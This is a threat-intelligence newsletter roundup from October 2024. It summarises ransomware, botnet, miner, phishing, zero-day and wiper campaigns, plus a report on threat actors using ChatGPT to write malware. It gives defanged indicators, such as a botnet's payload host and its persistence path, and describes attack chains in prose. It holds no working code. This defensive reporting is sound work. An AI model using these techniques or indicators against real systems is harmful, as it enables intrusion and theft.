ARTICLE
11 November 2024

Cyber Threat Investigations & Expert Services (CTIX) FLASH Wrap-Up - October 2024

AC
Ankura Consulting Group LLC

Contributor

Ankura Consulting Group, LLC is an independent global expert services and advisory firm that delivers end-to-end solutions to help clients at critical inflection points related to conflict, crisis, performance, risk, strategy, and transformation. Ankura consists of more than 1,800 professionals and has served 3,000+ clients across 55 countries. Collaborative lateral thinking, hard-earned experience, and multidisciplinary capabilities drive results and Ankura is unrivalled in its ability to assist clients to Protect, Create, and Recover Value. For more information, please visit, ankura.com.
Researchers at Microsoft have recently warned that threat actor Storm-0501 is now targeting and deploying ransomware in hybrid cloud environments in addition to on-premise environments.
Worldwide Real Estate and Construction

Executive Summary

The Ankura Cyber Threat Investigations and Expert Services (CTIX) FLASH Wrap-Up is a collection of high-level cyber intelligence summaries pertaining to current or emerging cyber events in September 2024, originally published in CTIX FLASH Updates throughout September. This publication includes malware threats, threat actor activity, and newly identified vulnerabilities impacting a wide range of industries and victims. The CTIX FLASH Update is a semi-weekly newsletter that provides a timely snapshot of cyber events, geared toward cyber professionals and end users with varying levels of technical knowledge. The events published in the FLASH typically occurred close in time to publication of the report.

To stay up to date on the latest cyber threat activity, sign up for our weekly newsletter: the Ankura CTIX FLASH Update.

MALWARE ACTIVITY

Storm-0501 Releases Embargo Ransomware in Cloud Environments

Reported in the October 1st, 2024, FLASH Update

  • Researchers at Microsoft have recently warned that threat actor Storm-0501 is now targeting and deploying ransomware in hybrid cloud environments in addition to on-premise environments. Storm-0501 is a ransomware threat actor that has been active since 2021 and has been known to utilize a variety of ransomware strains in their attacks including Hive, BlackCat, LockBit, and Embargo. Embargo ransomware is a Rust-based variety and is provided to threat groups under a ransomware-as-a-service (RaaS) model. Storm-0501 has targeted healthcare, government, transportation, law enforcement, and manufacturing industries in the United States. In recent attack campaigns, the group has expanded their infiltration operations to compromise hybrid cloud environments, exfiltrating data and encrypting systems to demand ransom from victims. Storm-0501 initially gains access to victim organizations either through compromised credentials or exploitation of known vulnerabilities. Once a privileged account in Microsoft's Entra ID (formerly Azure AD) is compromised, Storm-0501 establishes persistence by creating a new federated domain within the Microsoft Entra tenant. This is also a well-known tactic of the notorious Scatter Spider or "Octo Tempest" threat actor group. After victim data is exfiltrated, the Embargo ransomware payload is deployed using scheduled tasks or Group Policy Objects (GPOs) to encrypt files across devices. The compromise of federated identity access manager to gain access and establish persistence in cloud environments is becoming a more popular tactic amongst threat actors. In Entra ID environments, it is particularly important that organizations monitor authentication and activity of Microsoft Entra Connect Sync accounts, which are used to synchronize data between on-premise and cloud-based Active Directory. CTIX analysts will continue to report on new and emerging forms of malware and associated campaigns.

Nefarious Job Applicants Trick HR Professionals into Downloading More_eggs Malware

Reported in the October 4th, 2024, FLASH Update

  • Researchers at Trend Micro have recently reported on a malware campaign targeting HR professionals with the "more_eggs" malware. More_eggs is a backdoor sold as Malware-as-aService (Maas) attributed to the Golden Chickens (aka Venom Spider) threat group. More_eggs is capable of stealing credentials, delivering additional payloads, and establishing command-andcontrol (C2) with the attacker. Researchers at eSentire also reported on a similar campaign in June 2024 that delivered more_eggs malware to recruiters via fake job applications. Given more_eggs is available for purchase by cybercriminals, multiple different groups could be behind these recent campaigns. The attack reported by Trend Micro begins with a spear-phishing email to a recruiter from a fake job-seeker purportedly interested in an inside sales engineer role. This led the recruiter to click on a URL named after the bogus candidate, which opened a professional-looking personal website with another link to "Download CV". The download includes a LNK file and a jpeg file. The LNK file contains obfuscated commands which in turn execute a malicious DLL that drops the more_eggs malware onto the victim device. Submissions of similar LNK files to VirusTotal suggests that this is an ongoing campaign with two variations. The first variation includes LNK files typically named after a screenshot or document, uses string substitution for obfuscation, and includes additional PowerShell or Visual Basic scripts in the attack chain. The second variation includes LNK files typically named after a person, utilizes variable substitution for obfuscation, and does not use additional scripts in the infection chain. CTIX analysts recommend that recruiters use caution when downloading files from personal websites and consider compressed files or files with unexpected extensions to be particularly suspicious. CTIX analysts will continue to report on new and emerging forms of malware and associated campaigns.

New Gorilla Botnet Issues Over 300,000 DDOS Attacks

Reported in the October 8th, 2024, FLASH Update

  • Cybersecurity researchers have identified a new botnet family called "Gorilla Botnet" that has been particularly active through the month of September. The Botnet issued over 300,000 attack commands targeting over 100 countries, although most of the attacks were directed at the U.S., China, Canada, and Germany. Targets allegedly included universities, governments, telecommunications companies, banks, and the gaming industry. Researchers determined that the Botnet relied heavily on UDP Floods as its preferred method of attack followed by ACK Bypass Flood and VSE Flood methods. The Botnet can carry out many different types of attacks and uses encryption algorithms similar to those employed by the Keksec group to hide key information, suggesting that the attackers behind this campaign could be related to Keksec. Examination of Gorilla Botnet's source code indicates that it appears to be a variant of the leaked Mirai Botnet. The Botnet infection supports multiple CPU architectures, connects with one of five predefined command-and-control (C2) servers, and embeds functions to exploit a security flaw in Apache Hadoop YARN RPC to achieve remote code execution. The Botnet maintains persistence by creating a service file named "custom.service" within the "/etc/systemd/system/" directory which is configured to run automatically at system start up. This service downloads a shell script "lol.sh" from remote server "pen[.]gorillafirewall[.]su" to the "/tmp/" directory, sets execution permissions, and executes the script. Denial of Service attacks continue to be one of the most prevalent cybersecurity threats. CTIX analysts recommend that organizations implement controls to mitigate the risk posed by DOS attacks. CTIX analysts will continue to report on new and emerging forms of malware and associated campaigns.

SilentCryptoMiner Infects Over 28,000 Systems

Reported in the October 11th, 2024, FLASH Update

  • SilentCryptoMiner, a malware designed to hijack system resources for cryptocurrency mining, has been downloaded on over 28,000 systems in Russia, Turkey, and Ukraine. The campaign behind these infections promotes the malware as legitimate software on YouTube and GitHub repositories, and hides in game cheat codes, trading bots, and pirated office-related software. The fake software downloads are contained in a password-protected zip file, which when opened drops obfuscated scripts, DLL files, and an AutoIT interpreter that launches the main payload. As with most modern malware, the malicious download checks for the presence of debugging tools prior to preceding. The malware hijacks legitimate Windows system services and browser update processes to ensure it is executed upon launch of those processes. The Ncat network utility is used for command-and-control (C2) communications. There are two (2) main payloads of the infection. The first is "DeviceId.dll" which executes the SilentCryptoMiner malware to mine cryptocurrency using victim machine resources. The second is "7zxa.dll" which monitors the Windows clipboard for patterns resembling a cryptocurrency wallet address and replaces the string with a different wallet address under the attacker's control. Researchers have noted that this clipper functionality has stolen at least $6,000 worth of transactions by diverting victim funds to the attackers' wallets. CTIX analysts recommend that organizations and individuals do not download software from unvetted sources or websites. CTIX analysts will continue to report on new and emerging forms of malware and associated campaigns.

OpenAI Reports on Threat Actors using ChatGPT to Advance Cyber Attacks

Reported in the October 15th, 2024, FLASH Update

  • OpenAI recently released an October 2024 report "Influence and cyber operations: an update" which the company releases as a form of transparency reporting regarding their efforts to identify, prevent, and disrupt attempts to abuse their models for harmful ends. The report states that OpenAI has disrupted more than twenty (20) operations and deceptive networks from around the world maliciously using their Large Language Model (LLM) – ChatGPT – since May 2024. While cybersecurity experts identified campaigns that were assessed to have leveraged Generative AI in the creation of malware earlier this year, this report from OpenAI is the first official confirmation of the practice. Activities outlined in the report include those performed by threat actors "SweetSpecter", "CyberAv3ngers", and "Storm-0817". SweetSpecter is linked to China, and OpenAI was directly targeted by spear phishing emails containing the SugarGhost RAT sent to the personal email addresses of employees. OpenAI discovered that SweetSpecter used ChatGPT to perform scripting and vulnerability analysis research asking questions about specific CVE numbers, using sqlmap to upload web shells, and for debugging code. CyberAv3ngers is a threat actor allegedly associated with the Iranian government and reportedly used ChatGPT to build false credentials in Programmable Logic controllers (PLCs), develop bash and Python scripts, and to obfuscate code. Storm-0817 is also associated with Iran, and OpenAI reports that the group used ChatGPT to create an Instagram scraper and write and debug custom Android-based malware. OpenAI banned the accounts tied to the malicious activity and threat actors after discovery. CTIX analysts expect the misuse of Generative AI for the advancement of cybersecurity attacks to only become more prevalent. CTIX analysts will continue to report on new and emerging malware and associated campaigns.

Internet Explorer Zero-Day Leads to Zero-Click RokRAT Infections

Reported in the October 18th, 2024, FLASH Update

  • Threat Actor "ScarCruft" (AKA "APT37" or "RedEyes") has allegedly exploited an Internet Explorer zero-day flaw to host zero-click malware on toast advertisements. ScarCruft is a hacking group tied to North Korea and is known for targeting victims in South Korea and Europe with phishing, watering hole, and zero-day attacks. In a large-scale attack in May 2024, ScarCruft exploited a zero-day vulnerability in Internet Explorer to install the RokRAT malware on victim systems. RokRAT is designed to exfiltrate data to a Yandex cloud, log keystrokes, monitor for clipboard changes, and capture screenshots every three (3) minutes. ScarCruft has been known to use RokRAT in their attacks over the past few years. Cybersecurity researchers notified Microsoft of the campaign and flaw in August 2024, and although Internet Explorer is out of support, Microsoft released a security update to address the vulnerability tracked as CVE-2024-38178. ScarCruft carried out their campaign by compromising the server of a domestic advertising agency which served the malicious toast ads within a free software used by many in South Korea. Toast ads are pop-ups embedded in software to display notifications or advertisements. The attacker-crafted advertisements contained a malicious iframe which caused a JavaScript file to trigger remote execution via the flaw in Internet Explorer's "JScript9.dll" file. The malware payloads are injected in the explorer.exe process to evade detection. A payload "rubyq.exe" is dropped into the Windows startup and is scheduled for execution every four (4) minutes. Although Internet Explorer is out of support, it can still be integrated into third-party software, and that software may not have incorporated the latest update to fix this flaw. CTIX analysts will continue to report on new and emerging forms of malware and associated campaigns.

ESET Distributor Breached, Data Wipers Sent to Israeli Organizations

Reported in the October 22nd, 2024, FLASH Update

  • Cybercriminals have allegedly breached Comsecure, an Israeli distributor of ESET's software and cybersecurity products, to send phishing emails to Israeli organizations containing data wiping malware disguised as cybersecurity software. The phishing campaign began on October 8th, when emails from the legitimate eset[.]co[.]il domain were sent to Israel-based customers from ESET's "Advanced Threat Defense Team". The phishing emails warned that the recipient had recently been targeted by government-backed attackers and offers the recipient a link to download an advanced cybersecurity tool: "ESET Unleashed". The link directs users to the legitimate eset[.]co[.]il domain which hosts a ZIP archive containing four DLL files digitally signed by ESET's code signing certificate along with an executable "Setup.exe" that is not signed. "Setup.exe" is the data wiper, designed to delete all the files off of a victim's computer while corrupting the partition table to make data recovery difficult. ESET released a statement on October 18th, 2024, noting that the company was "...aware of a security incident which affected our partner company in Israel last week". ESET's announcement states that a "limited malicious campaign was blocked within ten minutes", and that their customers are secure. As of the time of this writing, the attack has not yet been attributed to a specific threat actor. CTIX analysts will continue to report on new and emerging forms of malware and associated campaigns.

To view the full article click here

The content of this article is intended to provide a general guide to the subject matter. Specialist advice should be sought about your specific circumstances.

Find out more and explore further thought leadership around Real Estate Law and Construction Law

Mondaq uses cookies on this website. By using our website you agree to our use of cookies as set out in our Privacy Policy.

Learn More